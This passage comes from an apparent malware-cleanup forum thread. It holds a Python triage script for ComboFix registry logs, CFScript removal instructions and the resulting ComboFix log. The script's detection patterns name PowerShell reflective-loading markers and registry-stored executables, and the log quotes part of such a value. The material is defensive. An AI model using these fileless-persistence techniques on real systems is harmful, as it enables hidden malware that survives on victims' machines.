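"IAStorIcon"="c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" [2011-05-20 284440]
.
[HKEY_USERS\S-1-5-21-336078627-3664855205-978596220-1153_Classes\CLSID]
"Default"=hex:01
"OCX"=hex:4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,\
  00,40,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
STR_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"(?:\s*\[(?P<tag>[^\]]*)\])?$')
HEX_RE = re.compile(r'^"(?P<name>[^"]+)"=hex:(?P<hex>.*)$')
PS_LOADER_MARKERS = ("reflection.assembly", "::load(", "gp -path", "get-itemproperty")
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\")  # applied to lowercased data

@dataclass
class Entry:
    key: str
    name: str
    data: str = ""                 # string data ("" for binary values)
    tag: Optional[str] = None      # ComboFix annotation: "X" = referenced file missing
    blob: Optional[bytes] = None   # decoded bytes of a hex: value

def _logical_lines(text: str):
    """Yield lines with .reg continuations (trailing backslash) joined."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""

def parse_entries(text: str) -> List[Entry]:
    """Turn ComboFix registry lines into Entry records, tracking the current key."""
    entries, key = [], ""
    for line in _logical_lines(text):
        if (m := KEY_RE.match(line)):
            key = m.group("key")
        elif (m := HEX_RE.match(line)):
            octets = [o for o in m.group("hex").split(",") if o.strip()]
            entries.append(Entry(key, m.group("name"), blob=bytes(int(o.strip(), 16) for o in octets)))
        elif (m := STR_RE.match(line)):
            entries.append(Entry(key, m.group("name"), m.group("data"), m.group("tag")))
    return entries

def assess(entry: Entry) -> List[str]:
    """Reasons an entry deserves a second look; an empty list means nothing seen."""
    reasons = []
    if entry.blob is not None:
        if entry.blob[:2] == b"MZ":  # DOS header of a PE image
            reasons.append("binary value starts with MZ: executable image stored in the registry")
        return reasons
    low = entry.data.lower()
    hits = [m for m in PS_LOADER_MARKERS if m in low]
    if "powershell" in low and hits:
        reasons.append("powershell autostart loads a .NET assembly from the registry: " + ", ".join(hits))
    if low.endswith(".dll") or "rundll32" in low:
        reasons.append("autostart target is a DLL rather than an executable")
    if USER_WRITABLE.search(low) and (".dll" in low or reasons):
        reasons.append("target lives in a user-writable profile folder")
    if entry.tag == "X":
        reasons.append("ComboFix marks the referenced file as missing ([X])")
    return reasons

def triage(text: str) -> List[Tuple[str, str, List[str]]]:
    """(key, value name, reasons) for every entry with at least one reason."""
    return [(e.key, e.name, r) for e in parse_entries(text) if (r := assess(e))]

def cfscript_registry_section(findings: list) -> str:
    """Registry:: stanza of a CFScript deleting flagged Run values, in the '"name"=-'
    form the helper used in this thread; hex blobs under other keys are left for review."""
    by_key = {}
    for key, name, _ in findings:
        if key.lower().endswith("\\run"):
            by_key.setdefault(key, []).append(name)
    lines = ["Registry::"]
    for key, names in by_key.items():
        lines.append("[%s]" % key)
        lines.extend('"%s"=-' % n for n in names)
    return "\n".join(lines)

if __name__ == "__main__":
    for key, name, reasons in triage(SAMPLE_LOG):
        print(key + "\\" + name, "->", "; ".join(reasons))
```

Run against the real log text, the entries ComboFix already annotates with [X] are reported alongside the ones it does not mark, so a user-profile DLL with a valid date/size stamp (as wvxdmfokq.dll above) is not missed.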
 
1. Please open Notepad (Start>All Programs>Accessories>Notepad).

2. Now copy/paste the entire content of the codebox below into the Notepad window:

Code:
File::
c:\windows\system32\vsjnrsv.dll
c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll

Folder::

Driver::
vsjnrsv
wvxdmfokq

Registry::
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wvxdmfokq"=-
"ocx"=-

ClearJavaCache::


3. Save the above as CFScript.txt

4. Close/disable all antivirus and anti-malware programs again, so they do not interfere with the running of ComboFix.

5. Then drag the CFScript.txt into ComboFix.exe as depicted in the animation below. This will start ComboFix again.

CFScript.gif



6. After reboot (in case it asks to reboot), please post the following reports/logs into your next reply:
  • Combofix.txt
 
ComboFix 14-10-04.01 - bella 10/07/2014 4:54.5.4 - x86
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.3493.1698 [GMT -4:00]
Running from: c:\download\Cleanup 10-6-14\ComboFix.exe
Command switches used :: c:\download\Cleanup 10-6-14\CFScript.txt
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\users\bella\AppData\Local\EmieUserList\wvxdmfokq.dll"
"c:\windows\system32\vsjnrsv.dll"
.
.
((((((((((((((((((((((((( Files Created from 2014-09-07 to 2014-10-07 )))))))))))))))))))))))))))))))
.
.
2014-09-17 12:07 . 2014-10-06 19:54 -------- d-sh--w- c:\users\bella\AppData\Local\EmieUserList
2014-09-17 12:07 . 2014-09-17 12:07 -------- d-sh--w- c:\users\bella\AppData\Local\EmieSiteList
2014-09-17 07:32 . 2014-08-18 21:30 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-09-17 07:31 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-09-17 07:25 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-17 07:25 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-09-17 07:25 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-09-17 07:25 . 2012-02-11 05:37 317440 ----a-w- c:\windows\system32\spoolsv.exe
2014-09-17 04:04 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-09-16 23:39 . 2014-09-16 23:39 -------- d-s---w- c:\windows\system32\CompatTel
2014-09-16 21:46 . 2014-09-16 21:46 -------- d-----w- c:\windows\Migration
2014-09-16 21:33 . 2014-09-16 21:38 -------- d-----w- c:\windows\system32\MRT
2014-09-16 21:31 . 2012-07-26 03:21 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-09-16 21:31 . 2012-07-26 03:20 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-09-16 21:31 . 2012-07-26 03:20 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-09-16 21:31 . 2012-07-26 03:20 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-09-16 21:31 . 2012-07-26 03:20 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-09-16 21:31 . 2012-07-26 02:33 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-09-16 21:31 . 2012-07-26 02:32 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-09-16 21:30 . 2014-03-09 21:47 99480 ----a-w- c:\windows\system32\infocardapi.dll
2014-09-16 21:30 . 2014-06-30 22:14 8856 ----a-w- c:\windows\system32\icardres.dll
2014-09-16 21:30 . 2014-03-09 21:47 619672 ----a-w- c:\windows\system32\icardagt.exe
2014-09-16 21:30 . 2014-06-06 06:16 35480 ----a-w- c:\windows\system32\TsWpfWrp.exe
2014-09-16 21:24 . 2013-05-10 04:56 12625408 ----a-w- c:\windows\system32\wmploc.DLL
2014-09-16 21:24 . 2013-05-10 03:48 164864 ----a-w- c:\program files\Windows Media Player\wmplayer.exe
2014-09-16 21:20 . 2014-09-16 21:20 1505280 ----a-w- c:\windows\system32\d3d11.dll
2014-09-16 21:11 . 2014-08-01 11:35 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-16 21:10 . 2013-01-24 04:47 196328 ----a-w- c:\windows\system32\drivers\fvevol.sys
2014-09-16 21:10 . 2012-08-21 20:12 245760 ----a-w- c:\windows\system32\OxpsConverter.exe
2014-09-16 21:10 . 2014-07-07 01:40 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-16 21:10 . 2014-07-07 01:40 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-16 21:10 . 2013-08-05 01:56 133056 ----a-w- c:\windows\system32\drivers\ataport.sys
2014-09-16 21:10 . 2014-09-05 01:52 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-16 21:10 . 2014-09-05 01:47 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-09-16 21:10 . 2014-08-23 01:46 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-09-16 21:10 . 2014-08-23 00:42 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-09-16 21:10 . 2013-10-30 02:19 301568 ----a-w- c:\windows\system32\msieftp.dll
2014-09-16 21:09 . 2013-07-12 10:07 86016 ----a-w- c:\windows\system32\drivers\usbcir.sys
2014-09-16 21:09 . 2012-01-04 08:58 442880 ----a-w- c:\windows\system32\ntshrui.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 87040 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-09-16 21:09 . 2013-12-04 02:03 423936 ----a-w- c:\windows\system32\secproc_isv.dll
2014-09-16 21:09 . 2013-12-04 02:03 428032 ----a-w- c:\windows\system32\secproc.dll
2014-09-16 21:09 . 2013-12-04 02:02 390144 ----a-w- c:\windows\system32\msdrm.dll
2014-09-16 21:09 . 2013-12-04 01:54 510976 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-09-16 21:09 . 2013-12-04 01:54 594944 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-09-16 21:09 . 2013-12-04 01:54 572416 ----a-w- c:\windows\system32\RMActivate.exe
2014-09-16 21:09 . 2013-12-04 01:54 508928 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-09-16 21:06 . 2013-11-27 01:14 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-09-16 21:06 . 2013-11-27 01:13 284672 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-09-16 21:06 . 2013-11-27 01:13 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-09-16 21:06 . 2013-11-27 01:13 43520 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-09-16 21:06 . 2013-11-27 01:13 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2014-09-16 21:06 . 2013-11-27 01:13 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-09-16 21:06 . 2013-11-27 01:13 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-09-16 21:02 . 2014-05-14 16:23 45536 ----a-w- c:\windows\system32\wups2.dll
2014-09-16 21:02 . 2014-05-14 16:23 54240 ----a-w- c:\windows\system32\wuauclt.exe
2014-09-16 21:02 . 2014-05-14 16:23 1973728 ----a-w- c:\windows\system32\wuaueng.dll
2014-09-16 21:02 . 2014-05-14 16:17 2425856 ----a-w- c:\windows\system32\wucltux.dll
2014-09-16 21:02 . 2014-05-14 16:23 36320 ----a-w- c:\windows\system32\wups.dll
2014-09-16 21:02 . 2014-05-14 16:23 581600 ----a-w- c:\windows\system32\wuapi.dll
2014-09-16 21:02 . 2014-05-14 16:17 92672 ----a-w- c:\windows\system32\wudriver.dll
2014-09-16 21:02 . 2014-05-14 13:23 179656 ----a-w- c:\windows\system32\wuwebv.dll
2014-09-16 21:02 . 2014-05-14 13:17 33792 ----a-w- c:\windows\system32\wuapp.exe
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-09-15 13:06 . 2011-10-19 21:14 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-29 20:34 . 2014-08-29 20:34 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-29 20:22 . 2014-08-29 20:22 33512 ----a-w- c:\windows\system32\drivers\TrueSight.sys
2014-08-29 07:15 . 2010-06-24 15:33 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-26 18:32 . 2010-11-20 21:29 376832 ----a-w- c:\windows\system32\rpcss.dll
2014-07-25 06:35 . 2014-07-25 06:35 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-19 13:10 . 2011-10-20 14:51 86888 ----a-w- c:\windows\system32\LMIRfsClientNP.dll
2014-07-19 13:10 . 2011-10-20 14:51 53064 ----a-w- c:\windows\system32\Spool\prtprocs\w32x86\LMIproc.dll
2014-07-19 13:10 . 2011-10-20 14:51 31560 ----a-w- c:\windows\system32\LMIport.dll
2014-07-19 13:10 . 2011-10-20 14:51 85832 ----a-w- c:\windows\system32\LMIinit.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\bella\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAStorIcon"="c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" [2011-05-20 284440]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2011-08-16 10820200]
"NUSB3MON"="c:\program files\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2011-04-14 113288]
"UpdateLBPShortCut"="c:\program files\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"CLMLServer"="c:\program files\CyberLink\Power2Go\CLMLSvc.exe" [2009-12-15 103720]
"UpdateP2GoShortCut"="c:\program files\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" [2009-05-20 222504]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2009-02-18 218408]
"UpdatePSTShortCut"="c:\program files\CyberLink\DVD Suite\MUITransfer\MUIStartMenu.exe" [2010-04-20 222504]
"LogMeIn GUI"="c:\program files\LogMeIn\x86\LogMeInSystray.exe" [2010-09-17 63048]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-09-01 142616]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-09-01 177432]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-09-01 176408]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-08-01 1821576]
"itype"="c:\program files\Microsoft IntelliType Pro\itype.exe" [2011-08-10 1313640]
"PC Meter Connect"="c:\program files\Pitney Bowes\PC Meter Connect\mailstationAssistant.exe" [2012-02-07 3514368]
"SBAMTray"="c:\program files\GFI Software\GFIAgent\SBAMTray.exe" [2012-10-16 3226504]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-12-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"="c:\program files\SMINST\Launcher.exe" [2010-04-02 237568]
.
c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\bella\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBAMSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SBPIMSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^Users^bella^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk]
path=c:\users\bella\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2013-12-21 06:04 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SBAMTray]
2012-10-16 20:29 3226504 ----a-w- c:\program files\GFI Software\GFIAgent\SBAMTray.exe
.
R3 DM150Drv;DM150Drv;c:\windows\system32\DRIVERS\DM150Drv.sys [2010-07-30 20600]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-16 108032]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-10-20 1343400]
R4 SAAZapsc;SAAZ RMM Agent Presence-SC;c:\progra~1\SAAZOD\zRealTime\SAAZapsc.exe SAAZapsc [x]
R4 SAAZRemoteSupport;SAAZRemoteSupport;c:\progra~1\SAAZOD\SAAZRemoteSupport.exe [2011-10-19 78664]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 51040]
R4 ZEvtSVC;ZEvtSVC;c:\progra~1\SAAZOD\zSCC\zEvtSVC.exe [2012-11-09 232752]
S2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-05-20 13592]
S2 Intel(R) PROSet Monitoring Service;Intel(R) PROSet Monitoring Service;c:\windows\system32\IProsetMonitor.exe [2011-06-29 112800]
S2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\LogMeIn\x86\LMIGuardianSvc.exe [2014-07-19 375120]
S2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\LogMeIn\x86\RaInfo.sys [2013-05-24 13624]
S2 MBAMScheduler;MBAMScheduler;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamscheduler.exe [2012-09-30 399432]
S2 MBAMService;MBAMService;c:\progra~1\SAAZOD\Malwarebytes' Anti-Malware\mbamservice.exe [2012-09-30 676936]
S2 SAAZappr;SAAZ RMM Agent Presence-PR;c:\progra~1\SAAZOD\zRealTime\SAAZappr.exe SAAZappr [x]
S2 SAAZDPMACTL;SAAZDPMACTL;c:\progra~1\SAAZOD\SAAZDPMACTL.exe [2011-10-19 86856]
S2 SAAZScheduler;SAAZScheduler;c:\progra~1\SAAZOD\SAAZScheduler.exe [2011-10-19 77824]
S2 SAAZServerPlus;SAAZServerPlus;c:\progra~1\SAAZOD\SAAZServerPlus.exe [2009-04-30 77824]
S2 SAAZWatchDog;SAAZWatchDog;c:\progra~1\SAAZOD\SAAZWatchDog.exe [2011-10-19 86856]
S2 SBAMSvc;VIPRE Business;c:\program files\GFI Software\GFIAgent\SBAMSvc.exe [2012-10-16 3675976]
S2 sbapifs;sbapifs;c:\windows\system32\DRIVERS\sbapifs.sys [2012-08-01 66344]
S2 SBPIMSvc;SB Recovery Service;c:\program files\GFI Software\GFIAgent\SBPIMSvc.exe [2012-10-16 175496]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2011-05-04 2656536]
S3 dc3d;MS Hardware Device Detection Driver (USB);c:\windows\system32\DRIVERS\dc3d.sys [2011-07-28 45288]
S3 gfiark;gfiark;c:\windows\system32\drivers\gfiark.sys [2013-05-23 43368]
S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys [2010-10-15 269824]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2012-09-30 22856]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2014-10-07 40776]
S3 MEI;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECI.sys [2010-10-19 41088]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys [2011-06-10 69504]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys [2011-06-10 161664]
S3 radpms;Driver for RADPMS Device;c:\windows\system32\DRIVERS\radpms.sys [2010-09-17 13408]
S3 sbwtis;sbwtis;c:\windows\system32\DRIVERS\sbwtis.sys [2012-10-16 75552]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - GFIARK
*NewlyCreated* - MBAMPROTECTOR
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-09-25 02:35 1096520 ----a-w- c:\program files\Google\Chrome\Application\37.0.2062.124\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-07 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 02:35]
.
2014-10-06 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
2014-10-07 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-16 17:50]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
Trusted Zone: ncjar.com\events
Trusted Zone: ncjar.com\www
TCP: DhcpNameServer = 192.168.0.20
TCP: Interfaces\{C8C75108-648B-43C0-B933-860C92875C7D}: NameServer = 192.168.0.20,8.8.8.8,208.67.222.222
.
- - - - ORPHANS REMOVED - - - -
.
MSConfigStartUp-BrowserWireless - c:\users\bella\AppData\Local\BrowserWireless\BrowserWireless.dll
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
"{2318C2B1-4965-11D4-9B18-009027A5CD4F}"=hex:51,66,7a,6c,4c,1d,38,12,df,c1,0b,
27,57,07,ba,54,e4,0e,43,d0,22,fb,89,5b
"{9030D464-4C02-4ABF-8ECC-5164760863C6}"=hex:51,66,7a,6c,4c,1d,38,12,0a,d7,23,
94,30,02,d1,0f,f1,da,12,24,73,56,27,d2
"{AA58ED58-01DD-4D91-8333-CF10577473F7}"=hex:51,66,7a,6c,4c,1d,38,12,36,ee,4b,
ae,ef,4f,ff,08,fc,25,8c,50,52,2a,37,e3
"{B4F3A835-0E21-4959-BA22-42B3008E02FF}"=hex:51,66,7a,6c,4c,1d,38,12,5b,ab,e0,
b0,13,40,37,0c,c5,34,01,f3,05,d0,46,eb
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:a4,03,e1,5a,85,b1,cf,01
.
[HKEY_USERS\S-1-5-21-336078627-3664855205-978596220-1153_Classes\CLSID]
@DACL=(02 0000)
"Default"=hex:01
"OCX"=hex:4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,
00,40,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_11_9_900_170_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-10-07 05:07:24
ComboFix-quarantined-files.txt 2014-10-07 09:07
ComboFix2.txt 2014-10-06 14:52
ComboFix3.txt 2014-09-01 19:44
ComboFix4.txt 2014-08-28 14:13
ComboFix5.txt 2014-10-07 08:53
.
Pre-Run: 428,413,886,464 bytes free
Post-Run: 428,341,559,296 bytes free
.
- - End Of File - - 0A2C66ACF9D07086933B238E9B17C595
5C616939100B85E558DA92B899A0FC36
 
